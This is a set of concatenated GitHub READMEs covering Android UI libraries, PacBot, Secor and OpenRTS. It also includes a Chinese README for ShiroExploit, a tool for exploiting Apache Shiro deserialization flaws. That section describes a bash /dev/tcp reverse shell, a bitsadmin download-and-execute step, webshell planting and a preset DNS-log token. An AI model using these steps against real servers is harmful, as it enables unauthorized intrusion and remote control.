name="cpEmptyTextColor" format="color|reference"/> <attr name="cpGridItemBackground" format="color|reference"/> <attr name="cpGridItemSpace" format="reference"/> <!--悬浮栏--> <attr name="cpSectionHeight" format="reference"/> <attr name="cpSectionTextSize" format="reference" /> <attr name="cpSectionTextColor" format="reference" /> <attr name="cpSectionBackground" format="reference" /> <attr name="cpIndexBarTextSize" format="reference" /> <attr name="cpIndexBarNormalTextColor" format="reference" /> <attr name="cpIndexBarSelectedTextColor" format="reference" /> <!--特写布局--> <attr name="cpOverlayWidth" format="dimension|reference"/> <attr name="cpOverlayHeight" format="dimension|reference"/> <attr name="cpOverlayTextSize" format="dimension|reference"/> <attr name="cpOverlayTextColor" format="color|reference"/> <attr name="cpOverlayBackground" format="color|reference"/> </resources> ``` OK,enjoy it~ # Changelog #### v2.1.0 - 迁移至AndroidX #### v2.0.3 - 修复状态栏变黑问题 - 修复字母索引栏被软遮挡的问题 - 新增取消选择监听 - 方法调用方式稍微改变 #### v2.0.2 - 修复定位城市偶尔不刷新的bug #### v2.0.1 - 新增定位接口 - 修改返回类型为`City` ,可获取城市名、code等数据 #### v2.0.0 - 项目重构优化,结构更清晰 - 使用RecyclerView # 感谢 [ImmersionBar](https://github.com/gyf-dev/ImmersionBar) # About me 掘金:[ https://juejin.im/user/56f3dfe8efa6310055ac719f ](https://juejin.im/user/56f3dfe8efa6310055ac719f) 简书:[ https://www.jianshu.com/u/913a8bb93d12 ](https://www.jianshu.com/u/913a8bb93d12) 淘宝店:[ LEON家居生活馆 (动漫摆件)]( https://shop238932691.taobao.com) ![LEON](https://raw.githubusercontent.com/zaaach/imgbed/master/arts/leon_shop_qrcode.png) :wink:淘宝店求个关注:wink: # QQ群 有兴趣可以加入QQ群一起交流: ![扫码入群601783167](https://raw.githubusercontent.com/zaaach/imgbed/master/arts/qqgroup.jpg)
PacBot (Policy as Code Bot)
angularjs aws aws-security cloud cloud-auditing cloud-compliance-reporting cloud-native cloud-security continous-compliance java policy-as-code security security-automation spring-boot
[![Latest release](https://img.shields.io/github/release/tmobile/pacbot.svg)](https://github.com/tmobile/pacbot/releases/latest) [![Build Status](https://travis-ci.com/tmobile/pacbot.svg?token=k3NCeDUn4HM7urPbq4oz&branch=master)](https://travis-ci.com/tmobile/pacbot) [![GitHub license](https://github.com/tmobile/pacbot/blob/master/wiki/license_apache.svg)](https://github.com/tmobile/pacbot/blob/master/LICENSE) [![GitHub contributors](https://img.shields.io/github/contributors/tmobile/pacbot.svg)](https://github.com/tmobile/pacbot/graphs/contributors) [![Gitter](https://github.com/tmobile/pacbot/blob/master/wiki/images/chat.svg)](https://gitter.im/TMO-OSS/PacBot) <img src="./wiki/images/banner_magenta.png"> # Introduction Policy as Code Bot (PacBot) is a platform for continuous compliance monitoring, compliance reporting and security automation for the cloud. In PacBot, security and compliance policies are implemented as code. All resources discovered by PacBot are evaluated against these policies to gauge policy conformance. The PacBot auto-fix framework provides the ability to automatically respond to policy violations by taking predefined actions. PacBot packs in powerful visualization features, giving a simplified view of compliance and making it easy to analyze and remediate policy violations. PacBot is more than a tool to manage cloud misconfiguration, it is a generic platform that can be used to do continuous compliance monitoring and reporting for any domain. ## More Than Cloud Compliance Assessment PacBot's plugin-based data ingestion architecture allows ingesting data from multiple sources. We have built plugins to pull data from Qualys Vulnerability Assessment Platform, Bitbucket, TrendMicro Deep Security, Tripwire, Venafi Certificate Management, Redhat Satellite, Spacewalk, Active Directory and several other custom-built internal solutions. We are working to open source these plugins and other tools as well. You could write rules based on data collected by these plugins to get a complete picture of your ecosystem and not just cloud misconfigurations. For example, within T-Mobile we have implemented a policy to mark all EC2 instances having one or more severity 5 (CVSS score > 7) vulnerabilities as non-compliant. ## Quick Demo [![](http://img.youtube.com/vi/_WnuSU5tfcs/0.jpg)](https://www.youtube.com/embed/_WnuSU5tfcs "") ## How Does It Work? **Assess -> Report -> Remediate -> Repeat** Assess -> Report -> Remediate -> Repeat is PacBot's philosophy. PacBot discovers resources and assesses them against the policies implemented as code. All policy violations are recorded as an issue. Whenever an Auto-Fix hook is available with the policies, those auto-fixes are executed when the resources fail the evaluation. Policy violations cannot be closed manually, the issue has to be fixed at the source and PacBot will mark it closed in the next scan. Exceptions can be added to policy violations. Sticky exceptions (Exception based on resource attribute matching criteria) can be added to exempt similar resources that may be created in future. PacBot's Asset Groups are a powerful way to visualize compliance. Asset Groups are created by defining one or more target resource's attribute matching criteria. For example, you could create an Asset Group of all running assets by defining criteria to match all EC2 instances with attribute instancestate.name=running. Any new EC2 instance launched after the creation of the Asset Group will be automatically included in the group. In PacBot UI you can select the scope of the portal to a specific asset group. All the data points shown in the PacBot portal will be confined to the selected Asset Group. Teams using cloud can set the scope of the portal to their application or org and focus only on their policy violations. This reduces noise and provides a clear picture to cloud users. At T-Mobile, we create an Asset Groups per stakeholder, per application, per AWS account, per Environment etc. Asset groups can also be used to define the scope of rule executions as well. PacBot policies are implemented as one or more rules. These rules can be configured to run against all resources or a specific Asset Group. The rules will evaluate all resources in the asset group configured as the scope for the rule. This provides an opportunity to write policies which are very specific to an application or org. For example, some teams would like to enforce additional tagging standards apart from the global standards set for all of the cloud. They can implement such policies with custom rules and configure these rules to run only on their assets. ## PacBot Key Capabilities * Continuous compliance assessment. * Detailed compliance reporting. * Auto-Fix for policy violations. * Omni Search - Ability to search all discovered resources. * Simplified policy violation tracking. * Self-Service portal. * Custom policies and custom auto-fix actions. * Dynamic asset grouping to view compliance. * Ability to create multiple compliance domains. * Exception management. * Email Digests. * Supports multiple AWS accounts. * Completely automated installer. * Customizable dashboards. * OAuth Support. * Azure AD integration for login. * Role-based access control. * Asset 360 degree. ## Technology Stack * Front End - Angular * Backend End APIs, Jobs, Rules - Java * Installer - Python and Terraform ## Deployment Stack * AWS ECS & ECR - For hosting UI and APIs * AWS Batch - For rules and resource collection jobs * AWS CloudWatch Rules - For rule trigger, scheduler * AWS Redshift - Data warehouse for all the inventory collected from multiple sources * AWS Elastic Search - Primary data store used by the web application * AWS RDS - For admin CRUD functionalities * AWS S3 - For storing inventory files and persistent storage of historical data * AWS Lambda - For gluing few components of PacBot PacBot installer automatically launches all of these services and configures them. For detailed instruction on installation look at the installation documentation. ## PacBot UI Dashboards & Widgets * ##### Asset Group Selection Widget <img src=./wiki/images/asset-group-applications.png> * ##### Compliance Dashboard <img src=./wiki/images/compliance.png> <img src=./wiki/images/compliance2.png> * ##### Policy Compliance Page - S3 buckets public read access <img src=./wiki/images/policy-compliance.png> * ##### Policy Compliance Trend Over Time <img src=./wiki/images/compliance-trend.png> * ##### Asset Dashboard <img src=./wiki/images/assets.png> * ##### Asset Dashboard - With Recommendations <img src=./wiki/images/asset-recommendation.png> * ##### Asset 360 / Asset Details Page <img src=./wiki/images/asset-details.png> * ##### Linux Server Quarterly Patch Compliance <img src=./wiki/images/linux-patch-compliance.png> * ##### Omni-Search Page <img src=./wiki/images/omni-search.png> * ##### Search Results Page With Results filtering <img src=./wiki/images/search-results.png> * ##### Tagging Compliance Summary Widget <img src=./wiki/images/tagging-summary.png> ## Installation Detailed installation instructions are available [here](https://github.com/tmobile/pacbot/wiki/Install) ## Usage The installer will launch required AWS services listed in the [installation instructions](https://github.com/tmobile/pacbot/wiki/Install). After successful installation, open the UI load balancer URL. Log into the application using the credentials supplied during the installation. The results from the policy evaluation will start getting populated within an hour. Trendline widgets will be populated when there are at least two data points. When you install PacBot, the AWS account where you install is the base account. PacBot installed on the base account can monitor other target AWS accounts. Refer to the instructions [here](https://github.com/tmobile/pacbot/wiki/Install#adding-new-aws-accounts-to-pacbot-to-monitor) to add new accounts to PacBot. By default base account will be monitored by PacBot. Login as Admin user and go to the Admin page from the top menu. In the Admin section, you can 1. Create/Manage Policies 2. Create/Manage Rules and associate Rules with Policies 3. Create/Manage Asset Groups 4. Create/Manage Sticky Exception 5. Manage Jobs 6. Create/Manage Access Roles 7. Manage PacBot Configurations See detailed instruction with screenshots on how to use the admin feature [here](https://github.com/tmobile/pacbot/wiki/Admin-Features ) ## User Guide / Wiki Wiki is [here](https://github.com/tmobile/pacbot/wiki). ## Announcement Blog Post [Introducing PacBot](https://opensource.t-mobile.com/blog/posts/introducing-pacbot/) ## License PacBot is open-sourced under the terms of section 7 of the Apache 2.0 license and is released AS-IS WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND.
Secor is a service implementing Kafka log persistence
# Pinterest Secor [![Build Status](https://travis-ci.org/pinterest/secor.svg)](https://travis-ci.org/pinterest/secor) Secor is a service persisting [Kafka] logs to [Amazon S3], [Google Cloud Storage], [Microsoft Azure Blob Storage] and [Openstack Swift]. ## Key features ## - **strong consistency**: as long as [Kafka] is not dropping messages (e.g., due to aggressive cleanup policy) before Secor is able to read them, it is guaranteed that each message will be saved in exactly one [S3] file. This property is not compromised by the notorious temporal inconsistency of [S3] caused by the [eventual consistency] model, - **fault tolerance**: any component of Secor is allowed to crash at any given point without compromising data integrity, - **load distribution**: Secor may be distributed across multiple machines, - **horizontal scalability**: scaling the system out to handle more load is as easy as starting extra Secor processes. Reducing the resource footprint can be achieved by killing any of the running Secor processes. Neither ramping up nor down has any impact on data consistency, - **output partitioning**: Secor parses incoming messages and puts them under partitioned s3 paths to enable direct import into systems like [Hive]. day,hour,minute level partitions are supported by secor - **configurable upload policies**: commit points controlling when data is persisted in S3 are configured through size-based and time-based policies (e.g., upload data when local buffer reaches size of 100MB and at least once per hour), - **monitoring**: metrics tracking various performance properties are exposed through [Ostrich], [Micrometer] and optionally exported to [OpenTSDB] / [statsD], - **customizability**: external log message parser may be loaded by updating the configuration, - **event transformation**: external message level transformation can be done by using customized class. - **Qubole interface**: Secor connects to [Qubole] to add finalized output partitions to Hive tables. ## Release Notes Release Notes for past versions can be found in [RELEASE.md](RELEASE.md). ## Setup/Configuration Guide Setup/Configuration instruction is available in [README.setup.md](README.setup.md). ### Secor configuration for Kubernetes/GKE environment Extra Setup instruction for Kubernetes/GKE environment is available in [README.kubernetes.md](README.kubernetes.md). ## Detailed design Design details are available in [DESIGN.md](DESIGN.md). ## License Secor is distributed under [Apache License, Version 2.0](http://www.apache.org/licenses/LICENSE-2.0.html). ## Maintainers * [Pawel Garbacki](https://github.com/pgarbacki) * [Henry Cai](https://github.com/HenryCaiHaiying) ## Contributors * [Andy Kramolisch](https://github.com/andykram) * [Brenden Matthews](https://github.com/brndnmtthws) * [Lucas Zago](https://github.com/zago) * [James Green](https://github.com/jfgreen) * [Praveen Murugesan](https://github.com/lefthandmagic) * [Zack Dever](https://github.com/zackdever) * [Leo Woessner](https://github.com/estezz) * [Jerome Gagnon](https://github.com/jgagnon1) * [Taichi Nakashima](https://github.com/tcnksm) * [Lovenish Goyal](https://github.com/lovenishgoyal) * [Ahsan Nabi Dar](https://github.com/ahsandar) * [Ashish Kumar](https://github.com/ashubhumca) * [Ashwin Sinha](https://github.com/tygrash) * [Avi Chad-Friedman](https://github.com/achad4) ## Companies who use Secor * [Airbnb](https://www.airbnb.com) * [Appsflyer](https://www.appsflyer.com) * [Branch](http://branch.io) * [Coupang](https://www.coupang.com) * [Credit Karma](https://www.creditkarma.com) * [GO-JEK](http://gojekengineering.com/) * [Nextperf](http://www.nextperf.com) * [PayTM](https://www.paytm.com) * [Pinterest](https://www.pinterest.com) * [Rakuten](http://techblog.rakuten.co.jp/) * [Robinhood](http://www.robinhood.com/) * [Simplaex](https://www.simplaex.com/) * [Skyscanner](http://www.skyscanner.net) * [Strava](https://www.strava.com) * [TiVo](https://www.tivo.com) * [VarageSale](http://www.varagesale.com) * [Viacom](http://www.viacom.com) * [Wego](https://www.wego.com) * [Yelp](http://www.yelp.com) * [Zalando](http://www.zalando.com) * [Zapier](https://www.zapier.com) ## Help If you have any questions or comments, you can reach us at [secor-users@googlegroups.com](https://groups.google.com/forum/#!forum/secor-users) [Kafka]:http://kafka.apache.org/ [Amazon S3]:http://aws.amazon.com/s3/ [Microsoft Azure Blob Storage]:https://azure.microsoft.com/en-us/services/storage/blobs/ [S3]:http://aws.amazon.com/s3/ [Google Cloud Storage]:https://cloud.google.com/storage/ [eventual consistency]:http://docs.aws.amazon.com/AmazonS3/latest/dev/Introduction.html#ConsistencyMode [Hive]:http://hive.apache.org/ [Ostrich]: https://github.com/twitter/ostrich [Micrometer]: https://micrometer.io [OpenTSDB]: http://opentsdb.net/ [Qubole]: http://www.qubole.com/ [statsD]: https://github.com/etsy/statsd/ [Openstack Swift]: http://swift.openstack.org [Protocol Buffers]: https://developers.google.com/protocol-buffers/ [Parquet]: https://parquet.apache.org/
Shiro550/Shiro721 一键化利用工具,支持多种回显方式
shiro shiro-exp shiro-exploit shiro-poc shiro550 shiro721
### 2019.11.9 update: 由于当初作者开发时能力有限,导致工具本身存在着笨重及问题较多等诸多缺点。目前有很多其他的优秀工具提供了对shiro检测/利用更好的支持(如更好的回显支持,更有效的gadget与直接支持内存shell等),此工具目前已相形见绌。请各位移步其他更优秀的项目,感谢各位的使用。 ### 2019.9.20 update: 对回显方式进行了一次更新,希望现在能好用一点 ### 2020.9.12 update: 很多回显方式在本地测试OK,但是在实际环境中却不行,这个问题我不知道该怎么解决,希望有师傅可以指导下或者一起讨论下。 # ShiroExploit 支持对Shiro550(硬编码秘钥)和Shiro721(Padding Oracle)的一键化检测,支持多种回显方式 ## 使用说明 ### 第一步:按要求输入要检测的目标URL和选择漏洞类型 + ```Shiro550```无需提供rememberMe Cookie,```Shiro721```需要提供一个有效的rememberMe Cookie + 可以手工指定特定的 Key/Gadget/EchoType(支持多选),如果不指定会遍历所有的 Key/Gadget/EchoType + 复杂Http请求支持直接粘贴数据包 ![pic1](https://github.com/feihong-cs/ShiroExploit/blob/master/imgForReadMe/x001.jpg?raw=true) ### 第二步: 选择攻击方式 ![pic2](https://github.com/feihong-cs/ShiroExploit/blob/master/imgForReadMe/x002.png?raw=true) #### 选择 ```使用 ceye.io 进行漏洞检测``` + 可以不进行任何配置,配置文件中已经预置了 CEYE 域名和对应的 Token,当然也可以对其进行修改。 + 程序会首先使用反序列化 ```SimplePrincipalCollection``` 的方式筛选出唯一 Key,然后依次调用各个 Gadget 生成 Payload + 缺点:程序会使用 API:http://api.ceye.io/v1/records?token=a78a1cb49d91fe09e01876078d1868b2&type=dns&filter=[UUID] 查询检测结果,这个 API 有时候会无法正常访问,导致在这种方式下无法找到 Key 或者有效的 Gadget #### 选择 ```使用 dnslog.cn 进行漏洞检测``` + 可以不进行任何配置,每次启动时程序会自动从 ```dnslog.cn``` 申请一个 DNS Record。 + 程序会首先使用反序列化 ```SimplePrincipalCollection``` 的方式筛选出唯一 Key,然后依次调用各个 Gadget 生成 Payload + 缺点:少数时候 dnslog.cn 会间隔较久才显示 DNS 解析结果导致程序无法找到 Key 或者有效的 Gadget,且 dnslog.cn 只会记录最近的10条 DNS 解析记录 #### 选择 ```使用 JRMP + dnslog 进行漏洞检测``` + 需要在 VPS 上通过命令```java -cp ShiroExploit.jar com.shiroexploit.server.BasicHTTPServer [HttpSerivce Port] [JRMPListener Port]```开启HttpService/JRMPListener,并按照要求填入相应 IP 和端口 + 如果开启 HttpService/JRMPListener 时未指定端口号,则 ```HTTPService``` 默认监听 ```8080``` 端口,```JRMPListener``` 默认监听 ```8088``` 端口 + 使用 ```JRMP``` 的方式进行漏洞检测,可以显著减小 cookie 大小 + 程序会首先使用反序列化 ```SimplePrincipalCollection``` 的方式筛选出唯一 Key,然后使用 ```JRMP``` 依次为各个 Gadget 生成对应的 JRMPListener #### 选择 ```使用回显进行漏洞检测``` + 针对不出网的情况进行漏洞检测,此时可以检测的 Gadget 类型会少于使用 DNSLog 方式的 Gadget类型 + 程序会首先使用反序列化 ```SimplePrincipalCollection``` 的方式筛选出唯一 Key,然后依次判断可用的 Gadget 类型和回显方式 + 支持多种回显方式,回显方式和代码请参考 [deserizationEcho](https://github.com/feihong-cs/deserizationEcho) + 使用写文件回显方式时,可以提供一个静态资源 URL,程序会将此静态资源所在的目录当做写入目录,若不提供,则写入根目录 + 测试 vulhub 拉取的镜像及 Windows下用 Tomcat 搭建的测试环境,结果如下 ![echo1](https://github.com/feihong-cs/ShiroExploit/blob/master/imgForReadMe/xxx.png?raw=true) ![echo2](https://github.com/feihong-cs/ShiroExploit/blob/master/imgForReadMe/yyy.png?raw=true) ### 第三步:检测漏洞并执行命令 + 程序在判断目标应用是否存在漏洞时,窗口上部的输入框无法进行输入。当程序检测出目标应用存在漏洞时,输入框可以进行输入并执行命令。 + ```反弹shell(linux)``` 采用 ```bash -i >& /dev/tcp/ 0>&1``` 的方式反弹 shell + ```反弹shell(Windows)``` 采用 ```bitsadmin``` 下载指定 URL 的 exe 文件并执行的方式获取 shell + ```获取Webshell``` 直接在使用者给出的路径(目录需要真实存在)下写入 webshell, webshell 名称和后缀名由使用者自行指定,webshell 的内容从 config 目录下的 shell.jsp 中读取 ![pic3](https://github.com/feihong-cs/ShiroExploit/blob/master/imgForReadMe/x003.png?raw=true) ## 备注 在使用漏洞检测主程序或者开启 HttpService/JRMPListener 时,均需要ysoserial.jar的支持,将ysoserial.jar和ShiroExploit.jar放置在同一目录即可。 ## 致谢 感谢 [AgeloVito](https://github.com/AgeloVito) ```怕冷的企鹅``` 给予本项目的技术支持
Real-Time Strategy game 3D engine coded in pure java
![please report broken links](https://s9.postimg.cc/9nsfu0wlr/code118.png) **<a href="https://twitter.com/dumas181" target="_blank">Follow me on twitter !</a>** # What is OpenRTS? OpenRTS is a 3D real-time strategy game engine. It's coded in Java 1.8, powered by jMonkeyEngine 3, and is open-source. OpenRTS intends to support any kind of common real-time strategy gameplay, design and control, providing its own editor and a versatile data structure. The project also wants to be a pool of RTS resources, giving access to a large and free-to-use set of maps, models, sounds, armies' data, and gameplays. OpenRTS is still under development. There is a long way to go and a huge and growing <a href="#github-issues-our-todo-list">TODO list</a>. We will be glad to receive any of your contributions! Watch <a href="https://www.youtube.com/watch?v=XjYJWFQFIVE" target="_blank">the engine in action!</a> # How to set up? The project uses Gradle to support any IDE, or none. Just <a href="https://help.github.com/articles/cloning-a-repository/" target="_blank">clone the repository</a>, then at the command-line in the clone's root directory run "`./gradlew run`" (or "`gradlew.bat run`" on windows). You want to set up in your favorite IDE like jMonkey SDK or Eclipse? Simple! Please follow <a href="https://github.com/methusalah/OpenRTS/wiki/Set-up-the-project-with-your-favorite-IDE-(Eclipse,-Netbeans,-etc.)" target="_blank">this page</a> of the wiki. The engine is set by default with a test dataset and some example maps you can load. - **F1** : Game Mode (static iso camera) - **F2** : Editor Mode - **F3** : First Person view (for testing purpose) # Need Help? First, you should take a look at the <a href="https://github.com/methusalah/OpenRTS/wiki" target="_blank">wiki</a>. Then you will likely want to go to the <a href="http://hub.jmonkeyengine.org/c/user-code-projects/openrts" target="_blank">forum</a>. And of course, you shouldn't hesitate to write to us at openRTS.team@gmail.com # How to contribute? You want to participate and make OpenRTS a fully functional game engine? Please do&mdash;the more the merrier! ### Forum The best place to start if you would like to contribute is in the <a href="http://hub.jmonkeyengine.org/c/user-code-projects/openrts" target="_blank">OpenRTS forum</a>! Join in on debates and brainstormings about how to make OpenRTS better. The forum is also the best place to meet our awesome team. ### GitHub issues, our TODO list We've got plenty of things you can work on right now, check our <a href="https://github.com/methusalah/OpenRTS/issues" target="_blank">current open issues</a>. And we will be happy to add your requested features to the <a href="https://github.com/methusalah/OpenRTS/labels/enhancement" target="_blank">enhancement list</a>. ### Resources OpenRTS wants to provide its own complete and workable dataset to allow immediate RTS creation. We are glad to welcome all your creations : models, sounds, maps, particle sprites, army data... And if your contribution respects the current <a href="https://pinterest.com/search/pins/?q=low%20poly" target="_blank">low-poly art style</a>, so much the only better! Please note that all your contributions will fall under the OpenRTS licence, and will become public and free-to-use, as is the engine itself. **Finaly, following (<a href="https://twitter.com/dumas181" target="_blank">twitter</a>), starring and sharing helps a lot !** ### Bug report If you find a bug (and you will probably see many), please search for existing <a href="https://github.com/methusalah/OpenRTS/issues?q=is%3Aopen+is%3Aissue+label%3Abug" target="_blank">bug reports</a> to avoid duplicates. Then open your issue with a little test case. You can also report it on the forum, if you prefer. # Licensing OpenRTS is released under the <a href="http://choosealicense.com/licenses/mit/" target="_blank">MIT License</a>, which will also apply to any contributions made to OpenRTS. See the file <a href="https://raw.githubusercontent.com/methusalah/OpenRTS/master/LICENSE" target="_blank">LICENSE</a>. ![please report broken links](http://s22.postimg.org/6j8jb89q9/5109be301e18c8bdeebafa35823b7f88a5af1555.png)
Rate limit auto-configure for Spring Cloud Netflix Zuul
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A cool search view animation library
JJSearchViewAnim ============================ [中文版文档及相关文章](https://github.com/android-cjj/JJSearchViewAnim/blob/master/README-CN.md) [![Android Arsenal](https://img.shields.io/badge/Android%20Arsenal-JJSearchViewAnim-green.svg?style=true)](https://android-arsenal.com/details/1/3390) ![](http://ww1.sinaimg.cn/mw690/7ef01fcagw1f2kefqi8ekj205s05s749.jpg) ####A cool search view animation library ,I hope you like it. ###look <table> <thead> <tr> <th>Design</th> <th>Demo</th> <th>Designer</th> <th>Class</th> </tr> </thead> <tbody> <tr> <td><img src="http://ww3.sinaimg.cn/mw690/7ef01fcagw1f2gzz0570bg20an05hmxv.gif" width="240"></td> <td><img src="http://ww2.sinaimg.cn/mw690/7ef01fcagw1f2kfx45rqyg20b505lq3b.gif" width="240"></td> <td>Nick</td> <td>JJDotGoPathController</td> </tr> <tr> <td><img src="http://ww1.sinaimg.cn/mw690/7ef01fcagw1f2gzyysygrg20an05h3zb.gif" width="240"></td> <td><img src="http://ww3.sinaimg.cn/mw690/7ef01fcagw1f2kfx4n06bg20b505l0te.gif" width="240"></td> <td>Oleg Frolov</td> <td>JJAroundCircleBornTailController</td> </tr> <tr> <td><img src="http://ww1.sinaimg.cn/mw690/7ef01fcagw1f2gzyx8egbg20an05h3zl.gif" width="240"></td> <td><img src="http://ww1.sinaimg.cn/mw690/7ef01fcagw1f2kfx516l3g20b505laa3.gif" width="240"></td> <td>sandeep virk</td> <td>JJBarWithErrorIconController</td> </tr> <tr> <td><img src="http://ww1.sinaimg.cn/mw690/7ef01fcagw1f2gzz1dsvsg20an06ltbr.gif" width="240"></td> <td><img src="http://ww3.sinaimg.cn/mw690/7ef01fcagw1f2kfx5ckjsg20b505lt97.gif" width="240"></td> <td>Jurre Houtkamp</td> <td>JJScaleCircleAndTailController</td> </tr> <tr> <td><img src="http://ww1.sinaimg.cn/mw690/7ef01fcagw1f2gzyzdp5vg20an05hgng.gif" width="240"></td> <td><img src="http://ww1.sinaimg.cn/mw690/7ef01fcagw1f2kg8o2htzg20b505ljrj.gif" width="240"></td> <td> Rahul Bhosale</td> <td>JJChangeArrowController</td> </tr> <tr> <td><img src="http://ww1.sinaimg.cn/mw690/7ef01fcagw1f2gzyzljmyg20an05h0t0.gif" width="240"></td> <td><img src="http://ww3.sinaimg.cn/mw690/7ef01fcagw1f2kfx644s8g20b505lglq.gif" width="240"></td> <td>Nicolás J. Engler</td> <td>JJCircleToLineAlphaController</td> </tr> <tr> <td><img src="http://ww1.sinaimg.cn/mw690/7ef01fcagw1f2gzywvmklg20an05hk2w.gif" width="240"></td> <td><img src="http://ww2.sinaimg.cn/mw690/7ef01fcagw1f2kfx6egogg20b505lq3r.gif" width="240"></td> <td> Boris Kirov </td> <td>JJCircleToBarController</td> </tr> <tr> <td><img src="http://ww4.sinaimg.cn/mw690/7ef01fcagw1f2gzyxopnfg20an05haaa.gif" width="240"></td> <td><img src="http://ww4.sinaimg.cn/mw690/7ef01fcagw1f2kfx6owemg20b505laav.gif" width="240"></td> <td>Anish Chandran</td> <td>JJCircleToSimpleLineController</td> </tr> <tr> <td><img src="http://ww2.sinaimg.cn/mw690/7ef01fcagw1f2gzz0xbkfg20an05hq47.gif" width="240"></td> <td><img src="https://camo.githubusercontent.com/8220bd55683ee57442aef6c833e1a971d07b6429/687474703a2f2f7777772e61706b6275732e636f6d2f646174612f6174746163686d656e742f666f72756d2f3230313530382f30372f313632343332673033696c7a7a69373335696d686d382e676966" width="240"></td> <td>Antonio Di Nardo</td> <td> MaterialSearchView</td> </tr> </tbody> </table> * The last effect you can find here:[MaterialSearchView](https://github.com/android-cjj/MaterialSearchView) ###Usage #### (1) In xml ```xml <RelativeLayout xmlns:android="http://schemas.android.com/apk/res/android" xmlns:tools="http://schemas.android.com/tools" android:layout_width="match_parent" android:layout_height="match_parent" tools:context="com.cjj.jjsearchviewanim.MainActivity"> <com.cjj.sva.JJSearchView android:id="@+id/jjsv" android:layout_width="match_parent" android:layout_height="match_parent"/> </RelativeLayout> ``` #### (2) In java ```java @Override protected void onCreate(Bundle savedInstanceState) { super.onCreate(savedInstanceState); setContentView(R.layout.activity_main); JJSearchView mJJSearchView = (JJSearchView) findViewById(R.id.jjsv); mJJSearchView.setController(new JJChangeArrowController()); } ``` #### (3) Setting ```java mJJSearchView.startAnim(); mJJSearchView.resetAnim(); ``` ####Thanks: [http://www.materialup.com/posts/search-0c73a055-dcc9-486f-8540-f9517204edf8](http://www.materialup.com/posts/search-0c73a055-dcc9-486f-8540-f9517204edf8) [http://www.materialup.com/posts/search-bar-concept](http://www.materialup.com/posts/search-bar-concept) [http://www.materialup.com/posts/search-inspiration](http://www.materialup.com/posts/search-inspiration) [http://www.materialup.com/posts/search](http://www.materialup.com/posts/search) [http://www.materialup.com/posts/search-input-focus-animation](http://www.materialup.com/posts/search-input-focus-animation) [http://www.materialup.com/posts/material-search](http://www.materialup.com/posts/material-search) [http://www.materialup.com/search?q=search](http://www.materialup.com/search?q=search) [http://www.materialup.com/posts/css3-jquery-material-design-close-animation](http://www.materialup.com/posts/css3-jquery-material-design-close-animation) ####About me A low-level android software development engineer, like watching cartoons, like playing football, love life ! If you want to make friends with me, You can email tell me.Email address: cjjcjj2014@gmail.com. License ======= The MIT License (MIT) Copyright (c) 2016 android-cjj Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
A shopping cart button with a telescopic displacement rotation animation ...一个带伸缩位移旋转动画的购物车按钮
animation ele shopping-cart-button
# AnimShopButton [![](https://jitpack.io/v/mcxtzhang/AnimShopButton.svg)](https://jitpack.io/#mcxtzhang/AnimShopButton) A shopping cart button with a telescopic displacement rotation animation ... 一个仿饿了么 带伸缩位移旋转动画的购物车按钮 注意,本控件非继承自`ViewGroup`,而是**纯自定义View**,实现的仿饿了么加入购物车控件,自带**闪转腾挪动画**的按钮。 图1 项目中使用的效果,考虑到了`View`的**回收复用**, 并且可以看到在`RecyclerView`中使用,切换`LayoutManager`也是没有问题的, ![项目中使用的效果](https://github.com/mcxtzhang/AnimShopButton/blob/master/gif/new.gif) 图2 Demo效果,测试各种属性值 ![图2 Demo效果,测试各种属性值](https://github.com/mcxtzhang/AnimShopButton/blob/master/gif/testAttr.gif) 图3 最新静态图 ![图3 最新静态图,测试各种属性值](https://github.com/mcxtzhang/AnimShopButton/blob/master/gif/attrs.png) # Article 相关博文: http://blog.csdn.net/zxt0601/article/details/54235736 想经济上支持我 or 想通过视频看我是怎么实现的: http://edu.csdn.net/course/detail/3898 # Import **Step 1. Add the JitPack repository to your build file** **Step 1. 在项目根build.gradle文件中增加JitPack仓库依赖。** ``` allprojects { repositories { ... maven { url "https://jitpack.io" } } } ``` Step 2. Add the dependency ``` dependencies { compile 'com.github.mcxtzhang:AnimShopButton:V1.2.0' } ``` # Usage xml: ``` <!--使用默认UI属性--> <com.mcxtzhang.lib.AnimShopButton android:id="@+id/btn1" android:layout_width="wrap_content" android:layout_height="wrap_content" app:maxCount="3"/> <!--设置了两圆间距--> <com.mcxtzhang.lib.AnimShopButton android:id="@+id/btn2" android:layout_width="wrap_content" android:layout_height="wrap_content" app:count="3" app:gapBetweenCircle="90dp" app:maxCount="99"/> <!--仿饿了么--> <com.mcxtzhang.lib.AnimShopButton android:id="@+id/btnEle" android:layout_width="wrap_content" android:layout_height="wrap_content" app:addEnableBgColor="#3190E8" app:addEnableFgColor="#ffffff" app:hintBgColor="#3190E8" app:hintBgRoundValue="15dp" app:hintFgColor="#ffffff" app:maxCount="99"/> ``` 注意: 加减点击后,具体的操作,要根据业务的不同来编写了,设计到实际的购物车可能还有写数据库操作,或者请求接口等,要操作成功后才执行动画、或者修改count,这一块代码每个人写法可能不同。 使用时,可以重写`onDelClick()`和` onAddClick()`方法,并在合适的时机回调`onCountAddSuccess()`和` onCountDelSuccess()`以执行动画。 效果图如图2. # Attributes |name|format|description|中文解释 |:---:|:---:|:---:|:---:| | isAddFillMode| boolean| Plus button is opened Fill mode default is stroke (false)|加按钮是否开启fill模式 默认是stroke(false) | addEnableBgColor| color|The background color of the plus button|加按钮的背景色 | addEnableFgColor| color|The foreground color of the plus button|加按钮的前景色 | addDisableBgColor| color|The background color when the button is not available|加按钮不可用时的背景色 | addDisableFgColor| color |The foreground color when the button is not available|加按钮不可用时的前景色 | isDelFillMode| boolean| Plus button is opened Fill mode default is stroke 